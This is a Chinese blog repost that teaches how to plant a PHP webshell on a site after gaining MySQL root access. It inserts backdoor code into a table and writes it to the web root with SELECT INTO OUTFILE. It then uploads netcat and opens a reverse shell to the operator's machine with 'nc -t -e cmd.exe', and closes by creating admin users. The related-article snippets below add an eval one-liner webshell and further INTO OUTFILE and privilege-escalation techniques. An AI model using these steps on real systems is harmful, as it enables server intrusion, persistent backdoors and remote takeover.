通过mysql获取php webshell

最新推荐文章于 2021-11-16 17:32:03 发布
最新推荐文章于 2021-11-16 17:32:03 发布
阅读量209 收藏
点赞数
文章标签: 数据库 php python
原文链接:https://my.oschina.net/u/147181/blog/164789
版权

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

   在获得目标网站的mysql权限之后,可进一步获取网站webshell,此方法前提①mysql权限是root,②获取到了网站的绝对路径。获取数据库权限的方法,可以尝试sql注入(方法参见易踪网文章,http://www.yeetrack.com/?p=20http://www.yeetrack.com/?p=272)。获取了mysql的root权限后,在数据库中新建一个表,表内有一个字段,字段内填入php后门代码,如create table doortable ( backdoor varchar(1000) ); 然后 insert into doortable (backdoor) values ("hello world");,实际内容改为php后门代码,php文件链接:http://pan.baidu.com/share/link?shareid=69995&uk=537055152 ,插入成功后,执行命令select * from doortable into outfile "c:apachehtdocstem.php", (实际操作中填入目标网站的绝对路径)。然后我们在自己的机器上去访问这个php文件,效果如图:

28005247_r56V.jpg

,我们可以在webshell中执行命令,如执行tasklist,效果如图:
28005248_GshH.jpg
我们还可以上传自定义的文件到目标网站的路径,如上传一个nc程序(易踪网分享: http://pan.baidu.com/share/link?shareid=69999&uk=537055152), 进一步建立一个反弹链接。选择下载文件中nc.exe,点击上传。上传成功后,首先在我们本机上监听一个端口,命令:nc -vv -l -p 8080,然后通过我们的php后门文件在服务器端执行命令:nc -t -e C:windowssystem32cmd.exe 192.168.1.102 8080。稍后,应该就在我们本地监听的cmd中,建立了一个链接,出现目标主机的shell,如图:
28005248_hQiJ.jpg
,然后就是net user新建管理员用户等等。。。youthflies发表在易踪网上,链接:http://www.yeetrack.com/?p=280

转载于:https://my.oschina.net/u/147181/blog/164789

weixin_34092455
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php 获取mysql结果集数据
supertree_l的博客
01-16 2912
$sql="select * from tab1"; //mysql语法 $result = $mysqli->query($sql); //执行mysql语句 $num=mysqli_fetch_all($result); //获取结果集,是一个二维数组,类似:[行1:[ 字段名1->值,...],行2[]... ] // $num = count($rec); // var_dump
php通过pdo连接mssql
sinat_30284251的博客
08-01 1624
/*   * PDO MSSQL  *  *  公司有个asp.net项目,想用php改写,但用php操作数据库太坑了     1、安装扩展 php.ini   extension=php_sqlsrv_53_ts_vc6.dll        extension=php_pdo_sqlsrv_53_ts_vc6.dll 2、安装 Microsoft SQL Server N
mysql—注入点获取WebShell的几种方式
Thunderclap的博客
11-16 4870
利用条件 1.有写文件条件 secure-file-priv(show variables) 要么禁用,要么设置了路径 show variables like '%secure%' 目录权限 对于MySQL来说,有可以对某个目录进行读写的权限 Selinux 是2.6版本的Linux内核中提供的强制访问控制(MAC)系统 2.知道绝对路径 3.PHP的GPC为 off状态,或者在开启gpc的情况下,可以通过十六进制的路径读写文件 4.查看当前数据库用户是否有File权限 select
MySQL获取PHP webshell
qq_43592364的博客
01-18 2149
在渗透测试中,希望通过MySQL获取webshell需要满足以下几个条件: 1、对web目录有写权限 2、GPC关闭(是否对单引号进行转义) 3、知道服务器的绝对路径 4、secure-file-priv为打开的状态 至少要满足以上4个条件,才能顺利通过MySQL获取webshell 接下来,为了能够模拟出渗透这一个过程,使用dvwa靶场来进行模拟(当然相比于真正的时间,中间会省...
MySQL获取webshell的几种方式
anan2175的博客
05-19 523
select ... into outfile 需要满足的条件 对web目录有写权限 GPC关闭(GPC:是否对单引号转义) 有绝对路径(读文件可以不用,写文件需要) 没有配置secure-file-priv 姿势 有union select '<?php assert($_POST["cmd"]);?>’ into outfile '/home/wwwroot/sh...
SQL注入之——Mysql+PHP手工获取webshell
温柔小薛的博客
04-04 1581
Mysql+PHP手工获取webshell 目录Mysql+PHP手工获取webshell一、使用 order by 查询字段二、使用联合查询来查询当前数据库、用户、版本信息等三、获取表名、字段、值四、Mysql root 用户密码存储位置五、对服务器文件进行读写操作六、怎么获取 Web 路径七、利用 sql 注入写入 webshell八、MysQL 获取 web 路径方法总结 只是大概流程,等梳...
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
MySQL注入中导出字段内容的研究通过注入导出WebShell
09-14
当这篇文章被显示时,如果服务器环境支持PHP且未关闭eval函数,攻击者就可以通过URL参数`cmd`传递任意PHP命令进行执行,从而实现WebShell的效果。 为了防止这种类型的注入攻击,开发者应遵循以下最佳实践: 1. ...
第01篇:MySQL注入点写WebShell的5种方式1
最新发布
08-03
MySQL注入是一种常见的安全漏洞,它允许攻击者通过输入恶意SQL语句来操纵数据库。本文将探讨如何利用MySQL注入点写入WebShell的五种方法,重点关注条件和具体步骤。 首先,确保存在一个可利用的MySQL注入点至关重要...
PHP+MySQL脱库
07-02
Webshell是一种恶意代码,黑客通过它可以在服务器上执行命令,控制服务器或者获取数据库信息。下面将详细阐述这个主题的相关知识点。 首先,我们来理解PHPMySQL的角色。PHP是一种广泛使用的开源脚本语言,常用于...
Mysql渗透笔记.pdf
01-25
MySQL渗透笔记 MySQL渗透笔记是 MySQL数据库安全...MySQL渗透笔记提供了 MySQL 数据库安全漏洞的利用和防御指南,涵盖目录猜解、获取数据库信息、使用 UNION 进一步注入、上传 WebShell 并执行代码等方面的知识点。
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1209
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
利用Mysql root帐号获取某Linux操作系统网站webshell
weixin_44023460的博客
12-08 2535
利用Mysql root帐号获取某Linux操作系统网站webshell simeon 获取Webshell,网上有很多文章,本文是phpMyAdmin漏洞利用与防范专题中的一个研究课题,其主要环境是在有Mysql数据库root帐号密码权限的基础下,如何通过技术手段获取Linux操作系统上建立的网站系统的webshell权限。 1.漏洞利用思路 1.1Mysql root帐号密码获取思路 (1)通...
asp写入mysql拿shell_MySQL获取webshell的几种方式
weixin_39735247的博客
12-20 222
免杀shell一句话webshellSELECT "
MySQL注入之木马上传拿webshell
热门推荐
Jim的博客
08-15 1万+
原理:利用MySQL中的写命令into outfile(固定式:select A into outfile B),在目标Web虚拟路径D:/WWW/下面生成一个木马文件  工具:中国菜刀 1.首先查找SQL注入点 使用单引号'报错,使用and 1=1页面正常和and 1=2页面不正常,来判断存在SQL注入 2.使用order by猜测字段数量 ?id=1+order+by+2--+
Mysql root账号general_log_file方法获取webshell
dfdhxb995397的博客
08-02 128
在前面的phpmyadmin漏洞利用专题中介绍了如何通过root账号来获取webshell,但在现实情况中,由于Mysql版本较高以及配置文件的缘故,往往无法直接通过root账号写入网站真实路劲下获取webshell;通过研究发现其实可以通过一些方法绕过,同样可以获取webshell,下面将整个渗透过程和方法跟大家分享。 1.信息收集 目标站点访问其子域名,如图1所...
Linux mysql root 提权
12-30 4561
* Usage:  * $ id  * uid=500(raptor) gid=500(raptor) groups=500(raptor)  * $ gcc -g -c raptor_udf.c  * $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc  * $ mysql -u ro
CTF-web 第十部分 webshell基础与免杀
iamsongyu的博客
11-15 1万+
一、什么是webshell (1)webshell简介         webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载...
webshell另类提权新姿势-php本地猜解MYSQL
王三三
04-18 980
代码笔记 php本地猜解MYSQL-字典文件猜解<? set_time_limit(0); //脚本不超时 $user=”root”; //用户名 //$passwd=file(“password.txt”); //密码字典 //for($i=0;$i<count($passwd);$i++){ //$pass=$passwd[$i]; connect($user,$pass); flush();
2021护网行动:MySQL注入与Webshell技术详解
- MySQL注入是常见的Web应用程序安全漏洞,攻击者可以通过构造恶意SQL语句来获取或修改数据库中的数据,甚至执行系统命令。一种常见手法是利用`SELECT`语句的`into outfile`特性来写入shell脚本(webshell),如`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值